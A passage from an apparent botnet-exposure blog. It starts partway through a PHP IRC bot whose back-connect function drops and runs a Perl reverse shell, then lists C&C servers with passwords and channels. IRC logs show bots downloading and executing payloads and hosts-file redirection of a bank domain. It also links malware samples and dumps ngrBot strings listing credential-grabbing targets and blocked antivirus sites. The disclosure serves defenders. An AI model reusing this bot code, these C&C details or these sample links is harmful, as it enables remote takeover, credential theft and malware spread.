}<br /> function conback($ip,$port)<br /> {<br /> $this->privmsg($this->config['chan'],"[\2conback\2]: tentando conectando a $ip:$port");<br /> $dc_source = "";<br /> if (is_writable("/tmp"))<br /> {<br /> if (file_exists("/tmp/dc.pl")) { unlink("/tmp/dc.pl"); }<br /> $fp=fopen("/tmp/dc.pl","w");<br /> fwrite($fp,base64_decode($dc_source));<br /> passthru("perl /tmp/dc.pl $ip $port &");<br /> unlink("/tmp/dc.pl");<br /> }<br /> else<br /> {<br /> if (is_writable("/var/tmp"))<br /> {<br /> if (file_exists("/var/tmp/dc.pl")) { unlink("/var/tmp/dc.pl"); }<br /> $fp=fopen("/var/tmp/dc.pl","w");<br /> fwrite($fp,base64_decode($dc_source));<br /> passthru("perl /var/tmp/dc.pl $ip $port &");<br /> unlink("/var/tmp/dc.pl");<br /> }<br /> if (is_writable("."))<br /> {<br /> if (file_exists("dc.pl")) { unlink("dc.pl"); }<br /> $fp=fopen("dc.pl","w");<br /> fwrite($fp,base64_decode($dc_source));<br /> passthru("perl dc.pl $ip $port &");<br /> unlink("dc.pl");<br /> }<br /> }<br /> }<br /><br />}<br /><br />$bot = new pBot;<br />$bot->start();<br /><br />?> <br /><br /></code></pre><br />hosting infos:<br />http://whois.domaintools.com/83.170.89.35<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-1073433847202779168?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-45475936063735464932012-01-22T17:55:00.002+01:002012-01-22T17:55:52.237+01:0094.102.0.165(ngrBot hosted in Turkey Netinternet Bilgisayar Ve Telekomunikasyon San. Ve Tic. Ltd. Sti)Remote Host Port Number<br />199.15.234.7 80<br />94.102.0.165 4444 PASS pas217<br /><br />JOIN #voLwy vol323<br />PONG :HTTP1.4<br />NICK n{US|XP-32a}mwwaozy<br />USER mwwaozy 0 * :mwwaozy<br /><br />hosting infos:<br />http://whois.domaintools.com/94.102.0.165<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-4547593606373546493?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-18782901653959180012012-01-20T19:57:00.001+01:002012-01-25T23:59:35.839+01:00lalorlz1.info(ngrBot hosted in Germany Weinstadt Hetzner Online Ag)Resolved : [lalorlz1.info] To [88.198.181.16]<br />Resolved : [lalorlz1.info] To [176.9.192.216]<br /><br />C&C Server: 88.198.181.16:5236<br />Server Password: <br />Username: raecpnp<br />Nickname: n{DE|XPa}raecpnp<br />Channel: #ROCK (Password: ngrBot) <br />Channeltopic: :,up http://www.jdkim.com//bbs/data/date/24upjmrlzz.exe 73F91FD360F6E8472B39D8AD58A251F6 | ,j #rockspread | ,s<br /><br />hosting infos:<br />http://whois.domaintools.com/88.198.181.16<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-1878290165395918001?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-57694943575770311692012-01-20T19:15:00.000+01:002012-01-20T19:15:27.949+01:0093.95.99.87(irc botnet hosted in Russian Federation Moscow Jsc Mediasoft Ekspert)Remote Host Port Number<br />93.95.99.87 1866<br /><br />NICK n[USA|XP|COMPUTERNAME]pxzflri<br />USER hh "" "lol" :hh<br /><br />Now talking in #!h!<br />Modes On: [ #!h! ] [ +smntu ]<br /><br />.load /99/106/112/81/55/59/40/110/116/35/105/120/111/108/117/108/110/38/127/122/100/56/126/9/22/45/45/35/61/47/45/56/47/117/104/83/104/119/126/71/120/46/102/126/105/<br /><br />hosting infos:<br />http://whois.domaintools.com/93.95.99.87<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-5769494357577031169?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-36190720780997273322012-01-18T19:41:00.001+01:002012-01-18T19:47:14.163+01:00irc.r00t.me.uk(gBot hosted in Seychelles Ideal Solution Ltd)Remote Host Port Number<br />irc.r00t.me.uk 7007<br /><br />PASS gBot<br />NICK n{USA|XP}eqqcbip<br />USER n{USA|XP}eqqcbip 0 0 :n{USA|XP}eqqcbip<br /><br />i dont have the exe to find more infos so try to find chanels your self<br />this botnet is from same guy here:http://www.exposedbotnets.com/2011/06/ircircattinfogbot-variant-hosted-in.html<br /><br />hosting infos:<br />http://whois.domaintools.com/193.107.16.113<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-3619072078099727332?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-19935862976225240942012-01-18T17:53:00.000+01:002012-01-18T17:53:11.725+01:0060.190.223.42(irc botnet hosted in China Zhejiang Ninbo Lanzhong Network Ltd)Remote Host Port Number<br />199.15.234.7 80<br />70.38.98.236 80<br />70.38.98.237 80<br />60.190.223.42 5101 PASS hax0r<br /><br />PRIVMSG #US! :[d="http://img102.herosh.com/2012/01/14/551459105.gif" s="65536 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\1.tmp" - Download retries: 0<br />PRIVMSG #US! :[d="http://img103.herosh.com/2012/01/14/594572320.gif" s="61440 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\2.tmp" - Download retries: 0<br />PRIVMSG #US! :[d="http://img103.herosh.com/2012/01/04/210592960.gif" s="27648 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\3.tmp" - Download retries: 0<br /><br /><br />PASS hax0r<br />KCIK n{US|XPa}utqszd<br />#ngme ng00<br />#new<br />#+,#p- #U<br /><br /><br />hosting infos:<br />http://whois.domaintools.com/60.190.223.42<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-1993586297622524094?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-68137105236169780432012-01-17T22:41:00.001+01:002012-01-20T20:18:47.169+01:00union-foros.com(irc botnet hosted in Seychelles Ideal Solution Ltd)Remote Host Port Number<br />193.107.19.60 1863<br /><br />NICK {XP\USA\919273}<br />JOIN #per<br />PRIVMSG #per :<br />14,1.<br />15:: [HOST]<br />adido Host:<br />3,1 echo 69.64.58.90 www.viabcp.com >> %windir%\system32\drivers\etc\hosts<br />3,1 echo 69.64.58.90 viabcp.com >> %windir%\system32\drivers\etc\hosts<br />USER COMPUTERNAME * 0 :COMPUTERNAME<br />MODE {XP\USA\919273} -ix<br /><br /><br />Now talking in #per<br />Topic On: [ #per ] [ .host.add 69.64.58.90 www.viabcp.com|.host.add 69.64.58.90 viabcp.com ]<br />Topic By: [ ronaldo ]<br />{WIN7\PER\710210}) ,1.:: [HOST] Añadido Host: 3,1 echo 69.64.58.90 www.viabcp.com >> %windir%\system32\drivers\etc\hosts ::<br />{WIN7\PER\710210}) ,1.:: [HOST] Añadido Host: 3,1 echo 69.64.58.90 viabcp.com >> %windir%\system32\drivers\etc\hosts ::<br />({2K\ESP\215304}) ,1.:: [HOST] Añadido Host: 3,1 echo 69.64.58.90 www.viabcp.com >> %windir%\system32\drivers\etc\hosts ::<br />{2K\ESP\215304}) ,1.:: [HOST] 11Añadido Host: 3,1 echo 69.64.58.90 viabcp.com >> %windir%\system32\drivers\etc\hosts ::<br />{WIN7\PER\710210}) ,1.:: iMBot 6--» [USB] Unidad extraible infestada 3,1 H: ::.<br /><br />C&C Server: 193.107.19.60:1863<br /> Server Password: <br /> Username: DELL-D3E62F7E26<br /> Nickname: {XP\DEU\500799}<br /> Channel: #per1 (Password: ) <br /> Channeltopic:<br /><br />hosting infos:<br />http://whois.domaintools.com/193.107.19.60<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-6813710523616978043?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-61834060535285006432012-01-17T21:24:00.005+01:002012-01-18T23:41:23.587+01:00d.xludakx.com(ngrBot hosted in Netherlands Amsterdam Leaseweb B.v )This NgrBotnet conect to 3 domains and is aproximatly 100k:<br />Resolved : [d.xludakx.com] To [95.211.165.62]<br />Resolved : [ab.0n3mmm.com] To [95.211.165.62]<br />Resolved : [ab.0n3mmm.com] To [178.33.143.52]<br />Resolved : [ab.0n3mmm.com] To [109.75.176.231]<br />Resolved : [pusikuracbre.com] To [95.211.165.62]<br /><br />Remote Host Port Number<br />199.15.234.7 80<br />95.211.165.62 4949 PASS ngrBot<br />109.75.176.231 4949 PASS ngrBot<br />178.33.143.52 4949 PASS ngrBot<br />ab.0n3mmm.com +666 uses ssl to conect to server<br />Outgoing connection to remote server: 95.211.165.62 TCP port 666<br /><br />Commands:<br />NAZEL<br />NAZELup<br />KOSOMAKYAD<br />msn.set<br />msn.int<br />http.set<br />http.int<br />http.inj<br />mdns<br />stats<br />speed<br />logins<br />slow<br />ssyn<br />stop<br /><br /><br />NICK n{US|XPa}jgyxjah<br />USER jgyxjah 0 0 :jgyxjah<br /><br />channels:<br />JOIN #darkfear## PASS redem<br />Now talking in #darkfear## Pass redem<br />Topic On: [ #darkfear## ] [ !m on !s -n !mod usbi on !j #d832 !j #b832 !j #u832 ]<br />Topic By: [ MrDD ]<br /><br />Now talking in #d832<br />Topic On: [ #d832 ] [ !NAZEL http://img104.herosh.com/2012/01/18/318591232.gif E0BC8C7AF95AC4C37D5B9DDA8D09F7E3 ]<br />Topic By: [ MrDD ]<br /><br />Now talking in #b832<br />Topic On: [ #b832 ] [ !mod bdns on !mdns www.dropbox.com !mdns dropbox.com !mdns 4shared.com !mdns www.4shared.com ]<br />Topic By: [ MrDDisBack ]<br /><br />Now talking in #u832<br />Topic On: [ #u832 ] [ !NAZELup http://hotfile.com/dl/141636596/b286cc5/MrDD.exe A0D5E99F50E5F5244E5289834FFC7D5A ]<br />Topic By: [ MrDD ]<br /><br />exe files just in case he delete samples from his links:<br /><a href="http://5932f945.theseforums.com">Download</a><br /><a href="http://www.crocko.com/39076129B8CB4F75B1958268A2AA0F32/SexyMama-382423.exe">Download</a><br /><a href="http://3a2d544c.whackyvidz.com">Download</a><br /><a href="http://www.crocko.com/EF1248DE93C44C3E8A8C8840426CDCF3/MrDD.exe">Download</a><br /><a href="http://www.crocko.com/82C8FFA5CAEC40178A08BFB137F97085/318591232.gif">Download</a><br /><a href="http://b7ae6797.urlbeat.net">Download</a><br /><br />Here is the bonus all ngrBot strings <br />all functions like passwd stealing,spreading through alot of online messengers,ddos,botkilling etc<br />The best option in ngrBot is this :<br />username<br />*hackforums.*/member.php<br />Hackforums IT STEALS HF HECKERS PASSWORDS can u belive this ? lool<br />Enjoy ngrBot<br /><br /><pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%"><code>Processes:<br />PID ParentPID User Path <br />--------------------------------------------------<br />C:\Documents and Settings\Mes documents\SexyMama-382423.exe <br /><br />Ports:<br />Port PID Type Path <br />--------------------------------------------------<br /><br />Explorer Dlls:<br />DLL Path Company Name File Description <br />--------------------------------------------------<br />No changes Found <br /><br />IE Dlls:<br />DLL Path Company Name File Description <br />--------------------------------------------------<br />No changes Found <br /><br />Loaded Drivers:<br />Driver File Company Name Description <br />--------------------------------------------------<br /><br />Monitored RegKeys<br />Registry Key Value <br />--------------------------------------------------<br /><br />Kernel31 Api Log<br /> <br />--------------------------------------------------<br />***** Installing Hooks ***** <br />719f74df RegOpenKeyExA (HKLM\System\CurrentControlSet\Services\WinSock2\Parameters) <br />719f80c4 RegOpenKeyExA (Protocol_Catalog9) <br />719f777e RegOpenKeyExA (00000093) <br />719f764d RegOpenKeyExA (Catalog_Entries) <br />719f7cea RegOpenKeyExA (000000000001) <br />719f7cea RegOpenKeyExA (000000000002) <br />719f7cea RegOpenKeyExA (000000000003) <br />719f7cea RegOpenKeyExA (000000000004) <br />719f7cea RegOpenKeyExA (000000000005) <br />719f7cea RegOpenKeyExA (000000000006) <br />719f7cea RegOpenKeyExA (000000000007) <br />719f7cea RegOpenKeyExA (000000000008) <br />719f7cea RegOpenKeyExA (000000000009) <br />719f7cea RegOpenKeyExA (000000000010) <br />719f7cea RegOpenKeyExA (000000000011) <br />719f7cea RegOpenKeyExA (000000000012) <br />719f7cea RegOpenKeyExA (000000000013) <br />719f7cea RegOpenKeyExA (000000000014) <br />719f7cea RegOpenKeyExA (000000000015) <br />719f7cea RegOpenKeyExA (000000000016) <br />719f7cea RegOpenKeyExA (000000000017) <br />719f7cea RegOpenKeyExA (000000000018) <br />719f7cea RegOpenKeyExA (000000000019) <br />719f7cea RegOpenKeyExA (000000000020) <br />719f7cea RegOpenKeyExA (000000000021) <br />719f2623 WaitForSingleObject(77c,0) <br />719f87c6 RegOpenKeyExA (NameSpace_Catalog5) <br />719f777e RegOpenKeyExA (00000039) <br />719f835b RegOpenKeyExA (Catalog_Entries) <br />719f84ef RegOpenKeyExA (000000000001) <br />719f84ef RegOpenKeyExA (000000000002) <br />719f84ef RegOpenKeyExA (000000000003) <br />719f84ef RegOpenKeyExA (000000000004) <br />719f2623 WaitForSingleObject(774,0) <br />719e1af2 RegOpenKeyExA (HKLM\System\CurrentControlSet\Services\Winsock2\Parameters) <br />719e198e GlobalAlloc() <br />7c80b72f ExitThread() <br />7d2454bb LoadLibraryA(MSVBVM60.DLL )=73370000 <br />73371c38 GetCommandLineA() <br />73372f57 CreateMutex((null)) <br />7d23eab5 WaitForSingleObject(764,7530) <br />733739f4 GetCommandLineA() <br />7338d1b3 LoadLibraryA(C:\WINDOWS\system32\VB6FR.DLL)=0 <br />7337452c GetVersionExA() <br />7337476c LoadLibraryA(OLEAUT32.DLL)=770e0000 <br />772370b9 GetVersionExA() <br />7723711c GetCommandLineA() <br />7337476c LoadLibraryA(SXS.DLL)=77210000 <br />774efa66 LoadLibraryA(oleaut32.dll)=770e0000 <br />73376792 RegOpenKeyA (HKLM\SOFTWARE\Microsoft\VBA\Monitors) <br />77daeff6 RegOpenKeyExA (HKLM\SOFTWARE\Microsoft\VBA\Monitors) <br />733a304a GetVersionExA() <br />7337a15b LoadLibraryA(KERNEL32)=7c800000 <br />7345d09c CreateFileA(C:\Documents and Settings\SexyMama-382423.exe) <br />7337a15b LoadLibraryA(msvbvm60)=73370000 <br />7345d34f ReadFile() <br />770fc957 LoadLibraryA(C:\WINDOWS\system32\kernel32.dll)=7c800000 <br />7337a15b LoadLibraryA(user32)=7e390000 <br />7c8165b3 WaitForSingleObject(74c,64) <br />7c8191f8 LoadLibraryA(advapi32.dll)=77da0000 <br />28014c WriteProcessMemory(h=754,len=400) <br />28014c WriteProcessMemory(h=754,len=10000) <br />28014c WriteProcessMemory(h=754,len=3800) <br />28014c WriteProcessMemory(h=754,len=2000) <br />28014c WriteProcessMemory(h=754,len=1e00) <br />28014c WriteProcessMemory(h=754,len=4) <br />7337a4c5 GetCurrentProcessId()=1720 <br />7337bdfa RegOpenKeyExA (HKLM\Software\Microsoft\Windows) <br />7337be1c RegOpenKeyExA (HTML Help) <br />7337be1c RegOpenKeyExA (Help) <br />7337c9ce WaitForSingleObject(7e4,ffffffff) <br />73373657 ExitProcess() <br />***** Injected Process Terminated ***** <br /><br />DirwatchData<br /> <br />--------------------------------------------------<br />WatchDir Initilized OK <br />Watching C:\DOCUME~1\LOCALS~1\Temp <br />Watching C:\WINDOWS <br />Watching C:\Program Files <br />Modifed: C:\WINDOWS\SoftwareDistribution\DataStore\DataStore.edb <br />Modifed: C:\WINDOWS\SoftwareDistribution\DataStore\Logs\edb.chk <br />Deteled: C:\WINDOWS\SoftwareDistribution\DataStore\Logs\tmp.edb <br />Modifed: C:\WINDOWS\SoftwareDistribution\DataStore\Logs\edb.log <br />Created: C:\WINDOWS\Prefetch\SEXYMAMA-382423.EXE-0B3EC77E.pf <br />Modifed: C:\WINDOWS\Prefetch\SEXYMAMA-382423.EXE-0B3EC77E.pf <br />Created: C:\DOCUME~1\LOCALS~1\Temp\JET6FC3.tmp <br />Created: C:\DOCUME~1\LOCALS~1\Temp\JET1A.tmp <br />Deteled: C:\DOCUME~1\LOCALS~1\Temp\JET1A.tmp <br />Deteled: C:\DOCUME~1\LOCALS~1\Temp\JET6FC3.tmp <br />File: SexyMama-382423.exe<br />Size: 158386 Bytes<br />MD5: 284AC2DF706657EF31ECBB59E7563698<br />Packer: File not found<br /><br />File Properties: CompanyName #"$"a<br />FileDescription fwk34<br />FileVersion 3.34.0132<br />InternalName ASFa<br />LegalCopyright <br />OriginalFilename ASK3.exe<br />ProductName La!ly<br />ProductVersion <br /><br />Exploit Signatures:<br />---------------------------------------------------------------------------<br />Scanning for 19 signatures<br />Scan Complete: 316Kb in 0,016 seconds<br />Urls<br />--------------------------------------------------<br />http://%s/%s<br />http://%s/<br />http://<br />http://api.wipmania.com/ftp://%s:%s@%s:%d<br /><br />RegKeys<br />--------------------------------------------------<br />gdatasoftware.<br />sunbeltsoftware.<br />Software\Microsoft\Windows\CurrentVersion\Run<br />Software\Microsoft\Windows\CurrentVersion\Run<br />Software\Microsoft\Windows\CurrentVersion\Policies\System<br />.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run<br /><br />ExeRefs<br />--------------------------------------------------<br />File: SexyMama-382423_dmp.exe_<br />.exe<br />%windir%\system32\cmd.exe<br />&&%%windir%%\explorer.exe %%cd%%%s<br />%0x.exe<br />Internet Explorer\1explore.exe<br />pidgin.exe<br />wlcomm.exe<br />msnmsgr.exe<br />msmsgs.exe<br />opera.exe<br />chrome.exe<br />ieuser.exe<br />1explore.exe<br />f1refox.exe<br />.ipconfig.exe<br />verclsid.exe<br />regedit.exe<br />rundll32.exe<br />cmd.exe<br />regsvr32.exe<br />.exe<br />lol.exe<br />winlogon.exe<br />explorer.exe<br />y%s\%s.exe<br />lsass.exe<br /><br />Raw Strings:<br />--------------------------------------------------<br />File: SexyMama-382423_dmp.exe_<br />MD5: 0152bd6046d860acdfe21abc5438eac2<br />Size: 323586<br /><br />Ascii Strings:<br />---------------------------------------------------------------------------<br />!This program cannot be run in DOS mode.<br />Rich:<br />.text<br />`.rdata<br />@.data<br />.reloc<br />WPVS<br />t1hh<br />_[^]<br />t-hP<br />QRPWV<br />RPQWV<br />QRPSV<br />txVhD<br />uaVhD<br />QRPSV<br />SVW3<br />u3h0<br />u!hh<br />h,eA<br />u3h0<br />u!hP<br />h,eA<br />PQRV<br />RPQW<br />u:WhD<br />u#WhD<br />QRPW<br />RPQV<br />RPQV<br />PQRV<br />RPQW<br />RSSh<br />vG9u<br />t0WSV<br />WVRj<br />WSPQR<br />vt9u<br />t0WSV<br />WVRj<br />WSPQR<br />gfff<br />WVRj<br />PWQR<br />u3h0<br />u!hh<br />h,eA<br />u3h0<br />u!hP<br />h,eA<br />>CAL <br />uGh4<br />u5hHqA<br />hHqA<br />=MSG t<br />=SDG <br />>MSG u`<br />h4eA<br />Wh4eA<br />h4eA<br />SVW3<br />SVW3<br />9:vP<br />G;9r<br />@W;F<br />Wj h<br />t&j,j<br />Wjdj<br />F4VP<br />SWf9<br />t-f;<br />t=hH<br />_^[]<br />|04+~4<br />_^[]<br />SVWP3<br />QWSVR<br />QPRWS<br />RPQS<br />WQRV<br />_^[]<br />_^[]<br />h8}C<br />Vh(|C<br />un9F<br />t2j h<br />L9_@vI<br />;_@r<br />h(|C<br />h(|C<br />h(|C<br />WVPQR<br />SQRj<br />STFU<br />A8j@<br />QWRPV<br />B0QPV<br />=tzA<br />PQRj<br />PQRj<br />SVWh<br />STFU<br />h(|C<br />Vh@P@<br />h,}C<br />L9^8vE<br />;^8r<br />hpP@<br />STFU<br />PL9^(v^<br />;^(r<br />9~0v/<br />;~0r<br />9^8v;<br />;^8r<br />9^@v2<br />;^@r<br />tu9]<br />RVWPQ<br />uXWV<br />QVWRP<br />u$WP<br />E$_^[<br />tpVW<br />uTVW<br />E$_^[<br />E$^[<br />E$_^[<br />h,eA<br />h,eA<br />QVWhP<br />h,eA<br />VWhP<br />h,eA<br />95hVA<br />QVht<br />8POST<br />tWWV<br />PQWj<br />Ph$eA<br />RPQVW<br />Ph$eA<br />RPQVW<br />WVRPS<br />u h(<br />QWRS<br />SVWh<br />SVW3<br />QhDeA<br />VWQh4<br />t"j V<br />SVWh<br />=USERt<br />=PASS<br />:Uu#Vh<br />8Pu.<br />=FEATt<br />=TYPEt<br />=PASVu<br />=STATt<br />=LISTu<br />uuhh<br />ucWVh<br />95LeA<br />RPQh<br />PQRh<br />QRPh<br />QVh:<br />Rh~f<br />_[^]<br />_[^]<br />F/PQ<br />~(WR<br />T0(RW<br />t=VW<br />Qh~f<br />u4SV<br />W$RP<br />tmQh<br />RSSh<br />t,PVQ<br />O,@PQ<br />TSVW3<br />WWWWh<br />F4RP<br />LSVW3<br />^<^[<br />V4QR<br />vJ9^,u<br />;F8v<br />N4PQ<br />F4RP<br />F@@PR<br />F,BRP<br />u-SSV<br />RSWWj<br />8httpu1<br />u$8H<br />Ph,eA<br />QRVP<br />RVPQ<br />Ph,eA<br />QRVP<br />RVPQ<br />Qh~f<br />SVWP<br />Rh~f<br />hh)A<br />h`)A<br />tlWP<br />Ph$`A<br />PhX`A<br />tlWP<br />Rh~f<br />_^[]<br />hp_A<br />SVWj<br />_^Yj<br />QPPPPh<br />h(*A<br />SVWj,<br />Vj\P<br />[@^]<br />Vj.P<br />[@^]<br />QRRj<br />RRRRf<br />[_^]<br />SVWh<br />@h\XA<br />Ph\XA<br />PhDjA<br />h0*A<br />h\XA<br />h\XA<br />*t2:<br />VhH*A<br />Qh4*A<br />QSV3<br />95LYA<br />j Ph4XA<br />h`*A<br />Vj#S<br />_^[]<br />Wj*P<br />^[_]<br />h0+A<br />h$+A<br />SVWh<br />VVVV<br />WWVS<br />SVW3<br />RVh-<br />@PVj<br />PVh-<br />VhH+A<br />SVW3<br />@PVj<br />RVj"W<br />hT+A<br />hT+A<br />h|+A<br />ht+A<br />Rhh+A<br />QhX+A<br />@PVR<br />Wj j+V<br /><%u2<br />VVVV<br />h\XA<br />h\XA<br />SVWh<br />Rh(jA<br />QRPu<br />PQRu<br />h ,A<br />Phd^A<br />PPhP^A<br />9Q@w<br />h\XA<br />hTXA<br />Php^A<br />8nu8h<br />Rhp^A<br />Qhp^A<br />hTXA<br />Rhp^A<br />8nu8h<br />hTXA<br />h@YA<br />PVRQh<br />PQRVh<br />RQPh<br />PQRSh<br />8_^[<br />ufh <br />h(YA<br />Rhp^A<br />hTXA<br />Rhp^A<br />hTXA<br />h|,A<br />h|,A<br />hx,A<br />hx,A<br />Rh8aA<br />hp,A<br />hd,A<br />8httpuM<br />8:uE<br />u>8P<br />PhD,A<br />$_^[<br /> _^[<br />h@,A<br />hhaA<br />QRPh4,A<br />h,YA<br />h$YA<br />h<YA<br />QRPh4,A<br />h4YA<br />RPQh4,A<br />SVWh<br />8#t"<br />RVWP<br />SVWR<br />hx,A<br />hx,A<br />PQhp^A<br />Phd^A<br />QRhp^A<br />SVW3<br />h -A<br />h\XA<br />PVh\XA<br />t"h<-A<br />t"h0-A<br />Vh0dA<br />u5h(-A<br />VhDdA<br />VhddA<br />h$eA<br />h,eA<br />h0eA<br />{h4eA<br />MhDeA<br />,h8eA<br />t)h0u<br />SVW3<br />RPhD-A<br />QRPh<br />QRPh<br />PQRh<br />PhPcA<br />PRhhbA<br />QRPh0_A<br />SVW3<br />tRh|,A<br />uBPh<br />h -A<br />PWQRh,bA<br />SPQh<br />PSRh<br />PQhPcA<br />PhhbA<br />hx,A<br />tqCh<br />s[h5<br />h\XA<br />Ph\XA<br />PhDjA<br />=XjA<br />hhXA<br />ht.A<br />SWhl.A<br />hd.A<br />h|XA<br />h|XA<br />Ph|XA<br />t'j j<br />h<.A<br />tgh <br />h46A<br />SVWh<br />hx,A<br />Rh$6A<br />h\/A<br />h\/A<br />tb@Ph<br />Rhd/A<br />;< t<br />SVW3<br />Wh00A<br />h 0A<br />5djA<br />5pjA<br />5|jA<br />95djA<br />6`jA<br />taVW<br />h@0A<br />hD0A<br />Ph|`A<br />|Sj 3<br />tlSSSSSSSSSShL0A<br />h\XA<br />Ph\XA<br />Phd0A<br />tU< u<br />u2Wh<br />h(3A<br />hT+A<br />hT+A<br />SVWh<br />hT+A<br />h,3A<br />u.h,3A<br />SVWh<br />RhP3A<br />PVQR<br />Qh8eA<br />h@3A<br />;SDG <br />8SDG <br />h,3A<br />Qhx3A<br />RPhl3A<br />QRhT3A<br />t!WV<br />_^[]<br />hhXA<br />h\XA<br />Ph\XA<br />hl.A<br />hd.A<br />hl.A<br />hd.A<br />hhnA<br />h(5A<br />t!h85A<br />uyhP<br />u^hP<br />_^t)<br />9|:~<br />:~+w:~<br />tK@boL@<br />L@iBK@<br />%s.%s<br />pdef<br />%s.%S<br />%s.Blocked "%s" from removing our bot file!<br />%s.Blocked "%S" from removing our bot file!<br />block<br />bdns<br />CreateFileW<br />0123456789ABCDEF<br />i.root-servers.org<br />%s.Blocked "%s" from moving our bot file<br />%s.Blocked "%S" from moving our bot file<br />%s.p10-> Message hijacked!<br />%s.p10-> Message to %s hijacked!<br />%s.p21-> Message hijacked!<br />msnmsg<br />msnint<br />baddr<br />X-MMS-IM-Format:<br />CAL %d %256s<br />msnu<br />Done frst<br />ngr->blocksize: %d<br />block_size: %d<br />NtFreeVirtualMemory<br />NtAllocateVirtualMemory<br />NtQuerySystemInformation<br />LdrEnumerateLoadedModules<br />NtQueryInformationProcess<br />LdrGetProcedureAddress<br />NtQueryVirtualMemory<br />LdrLoadDll<br />NtQueryInformationThread<br />LdrGetDllHandle<br />RtlAnsiStringToUnicodeString<br />\\.\pipe\%s<br />kernel32.dll<br />GetNativeSystemInfo<br />%s_%d<br />%s_0<br />%s-Mutex<br />SeDebugPrivilege<br />ntdll.dll<br />NtGetNextProcess<br />%s-pid<br />%s-comm<br />NtResumeThread<br />PONG <br />JOIN #<br />PRIVMSG #<br />%s.Blocked "%S" from creating "%S"<br />%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!<br />.exe<br />%s.Detected process "%S" sending an IRC packet to server %s:%d.<br />%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).<br />PRIVMSG %255s<br />JOIN %255s<br />PRIVMSG<br />JOIN<br />%s:%d<br />NtSetInformationProcess<br />%s.%s%s<br />%S%s%s<br />HKCU\<br />HKLM\<br />%s.%S%S<br />%S%S%S<br />state_%s<br />%s.%s (p='%S')<br />pop3://%s:%s@%s:%d<br />popgrab<br />%s:%s@%s:%d<br />anonymous<br />ftp://%s:%s@%s:%d<br />ftpgrab<br />%s.%s ->> %s (%s : %s)<br />%s.%s ->> %s : %s<br />Directadmin<br />WHCMS<br />cPanel<br />blog<br />%s-%s-%s<br />ffgrab<br />iegrab<br />%s.Blocked possible browser exploit pack call on URL '%s'<br />%s.Blocked possible browser exploit pack call on URL '%S'<br />webroot.<br />fortinet.<br />virusbuster.nprotect.<br />gdatasoftware.<br />virus.<br />precisesecurity.<br />lavasoft.<br />heck.tc<br />emsisoft.<br />onlinemalwarescanner.<br />onecare.live.<br />f-secure.<br />bullguard.<br />clamav.<br />pandasecurity.<br />sophos.<br />malwarebytes.<br />sunbeltsoftware.<br />norton.<br />norman.<br />mcafee.<br />symantec<br />comodo.<br />avast.<br />avira.<br />avg.<br />bitdefender.<br />eset.<br />kaspersky.<br />trendmicro.<br />iseclab.<br />virscan.<br />garyshood.<br />viruschief.<br />jotti.<br />threatexpert.<br />novirusthanks.<br />virustotal.<br />login[password]<br />login[username]<br />*members*.iknowthatgirl*/members*<br />IKnowThatGirl<br />*youporn.*/login*<br />YouPorn<br />*members.brazzers.com*<br />Brazzers<br />clave<br />numeroTarjeta<br />*clave=*<br />*bcointernacional*login*<br />Bcointernacional<br />*:2222/CMD_LOGIN*<br />*whcms*dologin*<br />*:2086/login*<br />*:2083/login*<br />*:2082/login*<br />*webnames.ru/*user_login*<br />Webnames<br />*dotster.com/*login*<br />Dotster<br />loginid<br />*enom.com/login*<br />Enom<br />login.Pass<br />login.User<br />*login.Pass=*<br />*1and1.com/xml/config*<br />1and1<br />token<br />*moniker.com/*Login*<br />Moniker<br />LoginPassword<br />LoginUserName<br />*LoginPassword=*<br />*namecheap.com/*login*<br />Namecheap<br />loginname<br />*godaddy.com/login*<br />Godaddy<br />Password<br />EmailName<br />*Password=*<br />*alertpay.com/login*<br />Alertpay<br />*netflix.com/*ogin*<br />Netflix<br />*thepiratebay.org/login*<br />Thepiratebay<br />*torrentleech.org/*login*<br />Torrentleech<br />*vip-file.com/*/signin-do*<br />Vip-file<br />*pas=*<br />*sms4file.com/*/signin-do*<br />Sms4file<br />*letitbit.net*<br />Letitbit<br />*what.cd/login*<br />Whatcd<br />*oron.com/login*<br />Oron<br />*filesonic.com/*login*<br />Filesonic<br />*speedyshare.com/login*<br />Speedyshare<br />*pw=*<br />*uploaded.to/*login*<br />Uploaded<br />*uploading.com/*login*<br />Uploading<br />loginUserPassword<br />loginUserName<br />*loginUserPassword=*<br />*fileserv.com/login*<br />Fileserve<br />*hotfile.com/login*<br />Hotfile<br 